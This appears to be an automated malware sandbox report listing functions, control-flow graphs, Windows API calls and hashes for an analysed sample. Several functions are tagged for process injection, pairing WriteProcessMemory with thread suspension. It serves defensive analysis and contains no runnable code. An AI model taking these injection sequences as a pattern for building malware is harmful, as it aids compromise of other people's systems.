                                                                      control_flow_graph 218 dd9748-dd9a06 220 dd9a15-dd9a18 call ddc0b6 218->220 222 dd9a1d-dd9a20 220->222 223 dd9a08-dd9a13 call ddc18f 222->223 224 dd9a22-dd9a23 222->224 223->220 227 dd9a24-dd9a30 223->227 228 dd9a4b-dd9a6f call dd99e1 call ddc1b7 227->228 229 dd9a32-dd9a4a call dd9994 call ddc050 227->229 238 dd9a78-dd9a7e 228->238 229->228 239 dd9a71-dd9a74 238->239 240 dd9a80-dd9a83 238->240 241 dd9a87-dd9a88 239->241 242 dd9a76-dd9a77 239->242 240->241 243 dd9a85 240->243 242->238 243->241
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DD9A18
                                                                        • Part of subcall function 00DDC0B6: __FF_MSGBANNER.LIBCMT ref: 00DDC0D9
                                                                        • Part of subcall function 00DDC0B6: __NMSG_WRITE.LIBCMT ref: 00DDC0E0
                                                                        • Part of subcall function 00DDC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00DDC12D
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00DD9A3B
                                                                        • Part of subcall function 00DD9994: std::exception::exception.LIBCMT ref: 00DD99A0
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00DD9A4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID: PU'
                                                                      • API String ID: 832318072-4254717615
                                                                      • Opcode ID: 5a2cd519584e8dd6040d3318d1848ebee6fb4cecd52bccd2a4edf43e8a90d7c1
                                                                      • Instruction ID: 09b50b1e38959e9f3ded025042075f562d760258b025f6c058daec71d9ef1d52
                                                                      • Opcode Fuzzy Hash: 5a2cd519584e8dd6040d3318d1848ebee6fb4cecd52bccd2a4edf43e8a90d7c1
                                                                      • Instruction Fuzzy Hash: 6F014C3340434A6A8F24B766D8329B9B798CB40368B587027F8499B386DA73DD41C7B1
                                                                      Function 00D8D1A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 244 d8d1a8-d8d1d2 245 d8d1d8-d8d206 244->245 246 d8d334-d8d352 244->246 251 d8d20c-d8d216 245->251 252 d8d323-d8d32d 245->252 253 d8d219-d8d225 call cf9244 251->253 252->246 256 d8d22b-d8d26d RegOpenKeyExW 253->256 257 d8d316-d8d31d 253->257 256->257 259 d8d273-d8d2a7 256->259 257->252 257->253 261 d8d2f8-d8d30e 259->261 262 d8d2a9-d8d2e0 259->262 262->261 266 d8d2e2-d8d2ee 262->266 266->261
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00D8D266
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00D8D250
                                                                      • layout text, xrefs: 00D8D297
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                      • API String ID: 71445658-2652665750
                                                                      • Opcode ID: f480718178c0309893974c14d822517d70219cfb520d9a990718f5816f0bb0a0
                                                                      • Instruction ID: aeb8058bb98e64d5a5dd4937cd6e8dca934e904495e84c1d485596ae7c22a8ea
                                                                      • Opcode Fuzzy Hash: f480718178c0309893974c14d822517d70219cfb520d9a990718f5816f0bb0a0
                                                                      • Instruction Fuzzy Hash: A6410875A00209AFDB11EF94CA81BAEB7F9EB49700F5040A5E904E7391E770EF04CB62
                                                                      Function 00CF9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 267 cf9070-cf907d 268 cf907f-cf90a1 SetErrorMode 267->268 269 cf90d0-cf90d2 267->269 270 cf90a3-cf90ad 268->270 271 cf90b2-cf90c8 SetErrorMode 268->271 270->271
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008000), ref: 00CF9084
                                                                      • SetErrorMode.KERNELBASE(?,00CF90D0), ref: 00CF90C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID: imm32.dll
                                                                      • API String ID: 2340568224-1815517138
                                                                      • Opcode ID: 003f145bfca057ca65303b32c1c59b8b3a5d948b31892ecc8f1900fd31cdbdde
                                                                      • Instruction ID: 6590ea6e6c608edcd5c6c10ee4f9dd5c66380cd1dacbd35abd0a402e6566ddde
                                                                      • Opcode Fuzzy Hash: 003f145bfca057ca65303b32c1c59b8b3a5d948b31892ecc8f1900fd31cdbdde
                                                                      • Instruction Fuzzy Hash: 43F0E276508348EFDF51EB65E91AB3577E8D349710FE180A5F208836A0DE759900DB35
                                                                      Function 00D8E394 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 348 d8e394-d8e3a1 349 d8e3ab-d8e3c1 348->349 350 d8e3a3 348->350 352 d8e3d8-d8e3e2 349->352 353 d8e3c3-d8e3d2 349->353 350->349 354 d8e3f2-d8e3fc 352->354 355 d8e3e4-d8e3ec 352->355 353->352 356 d8e40c-d8e516 call cca890 call cd3ea0 LoadIconW call cd4338 354->356 357 d8e3fe-d8e406 354->357 355->354 370 d8e518-d8e51b 356->370 371 d8e526-d8e537 356->371 357->356 370->371 373 d8e539 371->373 374 d8e53e-d8e56c call d83c28 371->374 373->374 379 d8e571-d8e586 374->379 380 d8e588-d8e58a call d8e7d8 379->380 381 d8e58f-d8e5db call d91304 call d91f70 379->381 380->381 387 d8e5ec-d8e5f3 381->387 388 d8e5dd-d8e5e9 381->388 388->387
                                                                      APIs
                                                                      • LoadIconW.USER32(00DB4040,MAINICON,?,?,?,00CF9410), ref: 00D8E4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: MAINICON
                                                                      • API String ID: 2457776203-2283262055
                                                                      • Opcode ID: 52d1538f10f52f7eb4e4fb8d4581c503e8e3937deae28ad740a62784629a8355
                                                                      • Instruction ID: 604a7de48831b2648df40f73dfdafd3a5917997420149104a39e68b524f7019c
                                                                      • Opcode Fuzzy Hash: 52d1538f10f52f7eb4e4fb8d4581c503e8e3937deae28ad740a62784629a8355
                                                                      • Instruction Fuzzy Hash: E2612870A04384CFDB40EF28D98AB9A3BE5AF15304F0845B9E808CF357DBB599488B71
                                                                      Function 00AFAF3C Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 390 afaf3c-afaf87 GetFileVersionInfoSizeW 394 afaffc-afb011 390->394 395 afaf89-afafba GetFileVersionInfoW 390->395 399 afafdf-afaff4 395->399 400 afafbc-afafd4 395->400 400->399 403 afafd6-afafdc 400->403 403->399
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 00AFAF7E
                                                                      • GetFileVersionInfoW.KERNELBASE(00000000), ref: 00AFAFB3
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000AEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_aeb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$Size
                                                                      • String ID:
                                                                      • API String ID: 2104008232-0
                                                                      • Opcode ID: a0465724b847056d05c0cad38d6f28ca1a536f1d9e9199c38b2a299e056e3e40
                                                                      • Instruction ID: 6d2fc651c7ccb7400f484cc6c6838e896f453d7760e662687a9f6deb5a28fe33
                                                                      • Opcode Fuzzy Hash: a0465724b847056d05c0cad38d6f28ca1a536f1d9e9199c38b2a299e056e3e40
                                                                      • Instruction Fuzzy Hash: 28213CB1A10209AFDB11EFE5CD928AEB7FCEB48710B514971B614E3651EB34AE00DA21
                                                                      Function 00DCB7A5 Relevance: 3.0, APIs: 2, Instructions: 46threadinjectionCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 404 dcb7a5-dcb7d9 Wow64SuspendThread 406 dcb7db 404->406 407 dcb805-dcb80b 404->407 408 dcb7dd-dcb7e0 406->408 409 dcb7e2-dcb804 WriteProcessMemory 406->409 408->407 408->409
                                                                      APIs
                                                                      • Wow64SuspendThread.KERNEL32 ref: 00DCB7A5
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00DCB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DCB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DCB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dcb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessSuspendThreadWow64Write
                                                                      • String ID:
                                                                      • API String ID: 2345646855-0
                                                                      • Opcode ID: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction ID: 003cb0afa001532189881a9a274459547ff39cb749068a4097b9bb9d0c70913f
                                                                      • Opcode Fuzzy Hash: b7a10879d2066c743689e0833f586f0bbe6c42a46d3e97db13997739e3d29073
                                                                      • Instruction Fuzzy Hash: 56F0593060010E26EB18987CEC06FEDBA9BCFC1630F298329B924C75D4E630880442A1
                                                                      Function 00EDCC3B Relevance: 2.6, Strings: 2, Instructions: 131COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 410 edcc3b-edcc4e 411 edcc86-edcc8c 410->411 412 edcc50-edcc63 410->412 413 edcc8d-edcc90 411->413 414 edcc2d-edcc37 412->414 415 edcc65 412->415 413->413 418 edcc92-edcce1 413->418 425 edcc39 414->425 426 edcbd7-edcbf7 414->426 416 edcc79-edcc7a 415->416 417 edcc67-edcc78 415->417 419 edcc7b-edcc83 416->419 420 edcce3-edccfb 416->420 417->416 418->420 422 edcc85 419->422 423 edcc27-edcc28 419->423 430 edcd07-edcd0f 420->430 422->411 423->414 425->410 431 edcbc0-edcbc6 425->431 427 edcbf9-edcc12 426->427 428 edcbca-edcbd1 426->428 427->423 428->426 431->428
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.0000000000EDC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EDC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_edc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$t
                                                                      • API String ID: 0-897426209
                                                                      • Opcode ID: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction ID: 24bf71fbd262e37e70b2fcfd84e4c8583413de69b83a8ec33843b13707be6b86
                                                                      • Opcode Fuzzy Hash: 7fa334fd72bc3d5bf1f73fcfde9ad3b1c31ef972c005667e9749b4e90cf11852
                                                                      • Instruction Fuzzy Hash: 3641DF719117438FC7168B3889895D9FF91FF523A4728166EC1D6972D2C7214487CBC5
                                                                      Function 00D87B98 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 433 d87b98-d87bba 434 d87c2c-d87c34 433->434 435 d87bbc-d87bc9 call d8cee4 433->435 437 d87c3d-d87c41 434->437 438 d87c36-d87c38 call d796d4 434->438 435->434 443 d87bcb-d87bcf 435->443 441 d87c4d 437->441 442 d87c43-d87c45 437->442 438->437 444 d87c4f-d87c57 441->444 442->444 445 d87c47-d87c4b 442->445 446 d87bd1-d87be3 call d8ced0 443->446 447 d87c59-d87c5b 444->447 448 d87c62-d87c64 444->448 445->441 445->444 458 d87be5-d87bf3 call d8ced0 446->458 459 d87c26-d87c2a 446->459 447->448 449 d87c6a-d87c6e 448->449 450 d87d31-d87d3a call cf2cf8 448->450 452 d87c7d-d87c87 449->452 453 d87c70-d87c77 449->453 463 d87d4b-d87d52 450->463 464 d87d3c-d87d46 call cf2928 KiUserCallbackDispatcher 450->464 456 d87c89-d87c90 452->456 457 d87c92-d87c96 452->457 453->450 453->452 456->457 461 d87c98-d87ca1 call cf2cf8 456->461 457->461 462 d87d0c-d87d13 457->462 458->459 477 d87bf5-d87c21 458->477 459->434 459->446 461->463 480 d87ca7-d87cc3 call cf2928 461->480 462->463 466 d87d15-d87d1e call cf2cf8 462->466 470 d87d5d-d87d6b call d87ad0 463->470 471 d87d54-d87d58 call d895c0 463->471 464->463 466->463 482 d87d20-d87d2f call cf2928 466->482 483 d87d6d-d87d71 470->483 484 d87db2-d87dc7 470->484 471->470 477->459 499 d87cfa-d87d0a call cf2928 call d796d4 480->499 500 d87cc5-d87ccc call d3d2a4 480->500 482->463 483->484 485 d87d73-d87d77 483->485 485->484 491 d87d79-d87dad call cf2928 call ceab94 * 2 485->491 491->484 499->463 507 d87cce-d87cd6 500->507 508 d87ce1-d87cf4 call cf2928 500->508 507->508 511 d87cd8-d87cdf 507->511 508->499 511->499 511->508
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00D87DC8), ref: 00D87D46
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: b7f7605a12a6f1833b457f9fd19f5e057958b6d1279250ba30856c1a6b55330a
                                                                      • Instruction ID: 4fe4f7674b1df6ec97413a6a125fc55b067316f141a62de0ef2d35d2b1f142ab
                                                                      • Opcode Fuzzy Hash: b7f7605a12a6f1833b457f9fd19f5e057958b6d1279250ba30856c1a6b55330a
                                                                      • Instruction Fuzzy Hash: 2051BA317083449BDB61BF38C889BAA7695AF05304F2C95B9FC419B297CAB4CC898770
                                                                      Function 00DAA114 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 516 daa114-daa121 517 daa3be-daa3c4 516->517 518 daa127-daa1a6 516->518 523 daa1a8-daa1ad GetNativeSystemInfo 518->523 524 daa1b2-daa1d1 518->524 523->524 525 daa1d3-daa1da 524->525 526 daa1e5-daa232 524->526 527 daa1dc-daa1e3 525->527 528 daa237-daa24e 525->528 526->528 527->526 527->528 531 daa33d-daa345 528->531 532 daa254-daa255 528->532 534 daa34e-daa35d 531->534 535 daa347 531->535 532->517 533 daa25b-daa263 532->533 536 daa276-daa27e 533->536 537 daa265 533->537 534->517 538 daa349-daa34a 535->538 539 daa35f-daa36e 535->539 542 daa280-daa28f 536->542 543 daa294-daa2a3 536->543 540 daa2a8-daa2b0 537->540 541 daa267-daa268 537->541 544 daa34c 538->544 545 daa370-daa378 538->545 539->517 548 daa2b2-daa2c1 540->548 549 daa2c6-daa2d5 540->549 552 daa2da-daa2e2 541->552 553 daa26a-daa26b 541->553 542->517 543->517 544->517 550 daa37a-daa380 545->550 551 daa393-daa39c 545->551 548->517 549->517 550->551 555 daa382-daa391 550->555 566 daa39e-daa3ad 551->566 567 daa3af-daa3b4 551->567 556 daa2f8-daa307 552->556 557 daa2e4-daa2f3 552->557 558 daa30c-daa313 553->558 559 daa271 553->559 555->517 556->517 557->517 570 daa329-daa338 558->570 571 daa315-daa324 558->571 559->517 566->517 567->517 570->517 571->517
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00DAA1AD
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000DAA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DAA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_daa000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      • API String ID: 1721193555-0
                                                                      • Opcode ID: 6b1d80010840633bb8c4f106edc73296cb7801a1e81c76ab6e9fe03435e6b3ad
                                                                      • Instruction ID: 70b42f46d5ee8bfd336db92f769ec8503d3544e758e20d68c7707701da06a3fe
                                                                      • Opcode Fuzzy Hash: 6b1d80010840633bb8c4f106edc73296cb7801a1e81c76ab6e9fe03435e6b3ad
                                                                      • Instruction Fuzzy Hash: AA616031608344DBCB24DB6CDA416AA77E5BB86300F644B2BE086CB365DB79D945CB33
                                                                      Function 00D8D5D8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 575 d8d5d8-d8d5f0 576 d8d601-d8d616 575->576 577 d8d5f2-d8d5fe 575->577 578 d8d618-d8d61f call d90d6c 576->578 579 d8d624-d8d639 576->579 577->576 578->579 582 d8d63b-d8d651 call ccacf0 579->582 583 d8d653-d8d662 call ccacf0 579->583 589 d8d667-d8d688 SystemParametersInfoW 582->589 583->589 591 d8d68a-d8d6ee call ccacf0 * 4 589->591 592 d8d6f0-d8d737 call ccae28 call ccacf0 * 3 589->592 613 d8d73c-d8d780 call ccaa7c * 3 591->613 592->613 622 d8d790 613->622 623 d8d782-d8d78b call d90d6c 613->623 623->622
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00D7F730,?,00D8CC47,00000000,00000000,00D8783C,6E6F4646,?,?,00000000), ref: 00D8D681
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      • API String ID: 3098949447-0
                                                                      • Opcode ID: 37778235410df5e2e27e13e5713b6de0d0e5c650dde221ee947484dc44bf84f6
                                                                      • Instruction ID: 2740b23b9697359a4438d6cc8393922945ce99f33c1d42108287209475b84ba0
                                                                      • Opcode Fuzzy Hash: 37778235410df5e2e27e13e5713b6de0d0e5c650dde221ee947484dc44bf84f6
                                                                      • Instruction Fuzzy Hash: DF415C31600248ABDB50FF78DD8AFAA33E9AB09700F1440B5B90CDB396EE319D458B75
                                                                      Function 00DCB7B0 Relevance: 1.5, APIs: 1, Instructions: 44injectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00DCB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DCB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DCB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dcb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction ID: 82500cae2ab3cfac8424c8ef9484fb1db4d51fb18100eb004315a8f25fd0d220
                                                                      • Opcode Fuzzy Hash: 1bd102d9b38021d0846288fdb63313cc0bd198b63639c95b7f010267bc66bdcc
                                                                      • Instruction Fuzzy Hash: 6DF02B3174010E26DB144C7CAC02FEDB79ACFC2630F19436AF914C71D4E670880542A1
                                                                      Function 00D8CFFC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00000000,?,?,?,00D7F730,00D8CB5F,?,?,00000000,?,00CF93F0), ref: 00D8D036
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CursorLoad
                                                                      • String ID:
                                                                      • API String ID: 3238433803-0
                                                                      • Opcode ID: 5f61bfa78244d89efdd4d69a9df9932b104010c37684e37f28287ebf50b090ea
                                                                      • Instruction ID: fdddc8f3307d4d1f4043989069302c574696d03acec621458ddb8df8ac39cfb0
                                                                      • Opcode Fuzzy Hash: 5f61bfa78244d89efdd4d69a9df9932b104010c37684e37f28287ebf50b090ea
                                                                      • Instruction Fuzzy Hash: C8F0A0526052405B9A206A7E4CC5E7A738ACF86730F300376FA2AC72D1CA256C0607B0
                                                                      Function 00CE94B0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00CE94EB
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2500173208.0000000000CAD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CAD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_cad000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction ID: e0bbe715bca3811110881742a92ef003db1fcb23f4917bcbe1fd8e336695c67c
                                                                      • Opcode Fuzzy Hash: 5535dc279ff1e877384e686dd9023c36d18ece0e40eb3ee833c40a88ae434141
                                                                      • Instruction Fuzzy Hash: D4F0DA762047119FC310DF5CC88494BB7E9EF89259F044A59F986DB351C771E814CB92
                                                                      Function 00DDE1B4 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00DDA850,?), ref: 00DDE1CA
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: 5292a1726a454128f0bad3e3b986ae7df4f1d6d171bbf6021e8b173b74069136
                                                                      • Instruction ID: 56bb9c67766d6cd2dabd22a94eef46ce51b0f6105dba9299fef37db45e3491d9
                                                                      • Opcode Fuzzy Hash: 5292a1726a454128f0bad3e3b986ae7df4f1d6d171bbf6021e8b173b74069136
                                                                      • Instruction Fuzzy Hash: 06D05E73A503456DEB20AF746D04B363BCC9784395F048836F80CCA650E674D940C220
                                                                      Function 00DD9736 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00DD9A18
                                                                        • Part of subcall function 00DDC0B6: __FF_MSGBANNER.LIBCMT ref: 00DDC0D9
                                                                        • Part of subcall function 00DDC0B6: __NMSG_WRITE.LIBCMT ref: 00DDC0E0
                                                                        • Part of subcall function 00DDC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00DDC12D
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DD9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DD9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dd9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_malloc
                                                                      • String ID:
                                                                      • API String ID: 501242067-0
                                                                      • Opcode ID: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction ID: 57b1f1caf9a30129cf39a614246a7c15e06498e1478157ad1c79a8bec0a8ea11
                                                                      • Opcode Fuzzy Hash: 323aceba6085630cbbd5596d4d5b77c1767793af26893b7f0b52c0e9e1e2273c
                                                                      • Instruction Fuzzy Hash: 52D09722008185E1CE24FAB8DC6F837B68C8940384304202BBC4869B46EE22E409C1B2
                                                                      Function 00DC5600 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2542568777.0000000000DC4000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC4000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_dc4000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction ID: ea9029c0a3fb809d2d1478c6fb3ad14a296d762ac169b6e21d2c441f4850191f
                                                                      • Opcode Fuzzy Hash: 588746909cfa64d80144b76e8fd91b7856a82ff47f490b7588349f52eb20acb1
                                                                      • Instruction Fuzzy Hash: FD31CE790187188BC309EF5AD4600BAB7D5FB94300F50462CEED3472A2EF756467CA92
                                                                      Function 011F2596 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.00000000011F2000.00000020.00000001.01000000.00000007.sdmp, Offset: 011F2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_11f2000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction ID: f715083a31002233e32fc72270bc9542b72aaed9e2c28978d23746f008ec45ca
                                                                      • Opcode Fuzzy Hash: bf4d2842a17e884762e2ba3b62d4c2161b49aa09bb580ee751a4a0e5e11d6f7e
                                                                      • Instruction Fuzzy Hash: 2301DC31118B0D4F430DBEA8948807A3285EB96321F65862ED687C30A6DB735423C682
                                                                      Function 00EDCD5C Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2545064061.0000000000EDC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00EDC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_edc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction ID: 4c05fa6a51c9fac5c4c47459151aa23ac051102ac7dddda15e05ecbaea80d435
                                                                      • Opcode Fuzzy Hash: 141a431efda3f275782b9303e2120bd369db4d46ed3f9551b093f6bc813fa1b9
                                                                      • Instruction Fuzzy Hash: A8D097A2C0420307AB0C3A3418264CBB781DAA326CB20610D820386261EB380086CA57

                                                                      Non-executed Functions

                                                                      Function 01F5D938 Relevance: 5.1, Strings: 4, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001A.00000002.2582215840.0000000001F5A000.00000020.00000001.01000000.00000007.sdmp, Offset: 01F5A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_26_2_1f5a000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$'$P$X
                                                                      • API String ID: 0-2666944636
                                                                      • Opcode ID: 4e2fac74f183a0bdaeb81c39fa4a1a7caa1bcb1f63f0039fea8e759a22399ee3
                                                                      • Instruction ID: 4a6fb49fa2d174438a534c2e662b8c53ffa9d8ad2de20fb034e95ed038d65917
